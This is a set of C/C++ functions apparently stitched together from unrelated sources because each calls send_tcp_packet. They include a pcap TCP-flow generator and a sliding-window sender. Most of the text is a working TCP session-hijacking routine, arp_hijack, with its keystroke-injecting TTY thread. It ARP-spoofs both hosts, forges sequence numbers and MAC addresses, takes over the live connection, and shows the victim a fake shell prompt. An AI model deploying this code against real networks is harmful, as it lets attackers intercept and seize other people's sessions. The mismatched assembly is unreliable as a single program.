void PcapGen::perform_tcp_shutdown(TcpState& from, TcpState& to)
{
send_tcp_packet(from, to, TH_FIN | TH_ACK, nullptr, 0);
from.set_seq(from.seq() + 1);
to.set_ack(from.seq());
send_tcp_packet(to, from, TH_ACK, nullptr, 0);
}
void PcapGen::perform_tcp_handshake(TcpState& client, TcpState& server)
{
send_tcp_packet(client, server, TH_SYN, nullptr, 0);
client.set_seq(client.seq() + 1);
server.set_ack(client.seq());
send_tcp_packet(server, client, TH_SYN | TH_ACK, 0, 0);
server.set_seq(server.seq() + 1);
client.set_ack(server.seq());
send_tcp_packet(client, server, TH_ACK, 0, 0);
}
void PcapGen::perform_tcp_transmission(TcpState& from, TcpState& to, const uint8_t* data, size_t size)
{
while (size != 0) {
size_t fragment = std::min(size, size_t(1460));
send_tcp_packet(from, to, TH_ACK, data, fragment);
from.set_seq(from.seq() + uint32_t(fragment));
to.set_ack(from.seq());
send_tcp_packet(to, from, TH_ACK, nullptr, 0);
size -= fragment;
data += fragment;
}
}
static void *watch_tty(struct watch_tty_data *wtd)
{
struct tcp_spec ts;
char buf[256];
int nr;
if (wtd->input_mode == INPUT_MODE_RAW)
tty_raw(0, 1, 0);
while ((nr = read(0, buf, sizeof(buf)))) {
if (buf[0] == 29) /* ^] */
break;
if (wtd->input_mode == INPUT_MODE_LINEECHO ||
wtd->input_mode == INPUT_MODE_LINEECHOR) {
if (nr >= 3 && buf[0] == '^' && buf[1] == ']' &&
buf[2] == '\n')
break;
if (wtd->input_mode == INPUT_MODE_LINEECHOR &&
nr < sizeof(buf) && buf[nr - 1] == '\n') {
buf[nr - 1] = '\r';
buf[nr++] = '\n';
}
}
memset(&ts, 0, sizeof(ts));
ts.saddr = wtd->ci->src_addr;
ts.daddr = wtd->ci->dst_addr;
ts.sport = wtd->ci->src_port;
ts.dport = wtd->ci->dst_port;
ts.src_mac = wtd->src_fake_mac;
ts.dst_mac = wtd->ci->dst.src_mac;
ts.seq = wtd->ci->dst.next_d_seq;
ts.ack_seq = wtd->ci->dst.next_seq;
ts.window = wtd->ci->src.window ? wtd->ci->src.window : htons(242);
ts.id = htons(ntohs(wtd->ci->src.id) + 1);
ts.ack = 1;
ts.psh = 1;
ts.rst = 0;
ts.data = buf;
ts.data_len = nr;
send_tcp_packet(&ts);
}
if (wtd->input_mode == INPUT_MODE_RAW)
tty_reset(0);
list_produce_done(&l_hijack_conn);
return NULL;
}
/*
* this thread will send stuff to the other host
*/
void send_stuff_thread(void)
{
packet_stream_t *packet_ptr;
/*
* this thread never sleeps. send the message to other host
* whenever there is stuff to send.
*/
while (TRUE)
{
sleep(5);
if (message_to_send != NULL)
{
printf("message found, breaking message into pieces\n");
break_message_into_packets();
initialize_tcp_window();
while (last_pkt->status != SENT)
{
sleep(1);
packet_ptr = window_start;
while (packet_ptr != window_end)
{
if ((packet_ptr->status == NOT_SENT) ||
((packet_ptr->status != SENT) && (packet_ptr->time_to_live >= PACKET_TTL)))
{
printf("sending tcp packet with seq. %d\n", packet_ptr->tcp_packet.pkt_sequence_number);
send_tcp_packet(&packet_ptr->tcp_packet);
}
/* slide window */
if (packet_ptr->status == SENT)
{
window_end = window_end->next_packet;
window_start = window_start->next_packet;
}
}
}
}
}
}
int arp_hijack(struct conn_info *ci, char *src_fake_mac, char *dst_fake_mac,
int input_mode)
{
struct iphdr *iph;
struct tcphdr *tcph;
struct tcp_spec ts;
struct ifunc_item ifunc_dst, ifunc_src;
struct packet *p;
int count_dst = 0, count_src = 0;
pthread_t thr_tty;
struct watch_tty_data wtd;
asi_src = asi_dst = NULL;
dont_relay = arp_dont_relay_insert(ci->src_addr, ci->dst_addr,
ci->src_port, ci->dst_port);
if (src_fake_mac) {
if (!(asi_src = start_arp_spoof(ci->src_addr, ci->dst_addr, NULL, NULL, NULL, 0, 0, 0))) {
asi_src = start_arp_spoof(ci->src_addr, ci->dst_addr,
ci->src.src_mac, ci->dst.src_mac,
src_fake_mac, 0, 0, 0);
}
} else
asi_src = get_arp_spoof(ci->src_addr, ci->dst_addr);
if (asi_src && user_arpspoof_test(asi_src)) {
if (user_run_arpspoof_until_successed(asi_src)) {
set_tty_color(COLOR_BRIGHTRED);
printf("ARP spoof of %s in host %s FAILED\n",
host_lookup(asi_src->src_addr, hl_mode),
host_lookup(asi_src->dst_addr, hl_mode));
set_tty_color(COLOR_LIGHTGRAY);
fflush(stdout);
if (src_fake_mac)
stop_arp_spoof(asi_src);
asi_src = NULL;
}
}
if (dst_fake_mac) {
if (!(asi_dst = start_arp_spoof(ci->dst_addr, ci->src_addr, NULL, NULL, NULL, 0, 0, 0))) {
asi_dst = start_arp_spoof(ci->dst_addr, ci->src_addr,
ci->dst.src_mac, ci->src.src_mac,
dst_fake_mac, 0, 0, 0);
}
} else
asi_dst = get_arp_spoof(ci->dst_addr, ci->src_addr);
if (asi_dst && user_arpspoof_test(asi_dst)) {
if (user_run_arpspoof_until_successed(asi_dst)) {
set_tty_color(COLOR_BRIGHTRED);
printf("ARP spoof of %s in host %s FAILED\n",
host_lookup(asi_dst->src_addr, hl_mode),
host_lookup(asi_dst->dst_addr, hl_mode));
set_tty_color(COLOR_LIGHTGRAY);
fflush(stdout);
if (dst_fake_mac)
stop_arp_spoof(asi_dst);
asi_dst = NULL;
}
}
set_tty_color(COLOR_WHITE);
printf("you took over the connection\n");
set_tty_color(COLOR_BRIGHTRED);
printf("CTRL-] to break\n");
set_tty_color(COLOR_LIGHTGRAY);
fflush(stdout);
wtd.src_fake_mac = asi_src ? asi_src->src_fake_mac : ci->src.src_mac;
wtd.ci = ci;
wtd.input_mode = input_mode;
list_produce_start(&l_hijack_conn);
pthread_create(&thr_tty, NULL, (void *(*)(void *)) watch_tty, &wtd);
ifunc_dst.func = (void(*)(struct packet *, void *)) func_hijack_dst;
ifunc_dst.arg = ci;
list_enqueue(&l_ifunc_tcp, &ifunc_dst);
ifunc_src.func = (void(*)(struct packet *, void *)) func_hijack_src;
ifunc_src.arg = ci;
list_enqueue(&l_ifunc_tcp, &ifunc_src);
while ((p = list_consume(&l_hijack_conn, NULL))) {
iph = p->p_iph;
tcph = p->p_hdr.p_tcph;
if (iph->saddr == ci->dst_addr &&
iph->daddr == ci->src_addr &&
tcph->source == ci->dst_port &&
tcph->dest == ci->src_port) {
/* packet from dest */
if (p->p_data_len) {
print_data_packet(p, p->p_data_len, ++count_dst, 1);
packet_free(p);
/* send ACK */
memset(&ts, 0, sizeof(ts));
ts.saddr = ci->src_addr;
ts.daddr = ci->dst_addr;
ts.sport = ci->src_port;
ts.dport = ci->dst_port;
ts.src_mac = asi_src ? asi_src->src_fake_mac :
ci->src.src_mac;
ts.dst_mac = ci->dst.src_mac;
ts.seq = ci->dst.next_d_seq;
ts.ack_seq = ci->dst.next_seq;
ts.window = ci->src.window ? ci->src.window : htons(242);
ts.id = htons(ntohs(ci->src.id) + 1);
ts.ack = 1;
ts.psh = 1;
ts.rst = 0;
ts.data = NULL;
ts.data_len = 0;
send_tcp_packet(&ts);
} else
packet_free(p);
} else {
if (p->p_data_len) {
/* packet from source */
print_data_packet(p, p->p_data_len, ++count_src, 0);
memset(&ts, 0, sizeof(ts));
ts.saddr = ci->dst_addr;
ts.daddr = ci->src_addr;
ts.sport = ci->dst_port;
ts.dport = ci->src_port;
ts.src_mac = asi_dst ? asi_dst->src_fake_mac :
ci->dst.src_mac;
ts.dst_mac = ci->src.src_mac;
ts.seq = ci->src.next_d_seq;
ts.ack_seq = ci->src.next_seq;
ts.window = ci->dst.window ? ci->dst.window :
htons(242);
ts.id = htons(ntohs(ci->dst.id) + 1);
ts.ack = 1;
ts.psh = 1;
ts.rst = 0;
if (p->p_data[0] == '\r' || p->p_data[0] == '\n') {
ts.data = "\r\n$ ";
ts.data_len = 4;
} else {
ts.data = p->p_data;
ts.data_len = p->p_data_len;
}
send_tcp_packet(&ts);
}
packet_free(p);
}
}
list_remove(&l_ifunc_tcp, &ifunc_dst);
list_remove(&l_ifunc_tcp, &ifunc_src);
packet_flush(&l_hijack_conn);
pthread_join(thr_tty, NULL);
return 0;
}
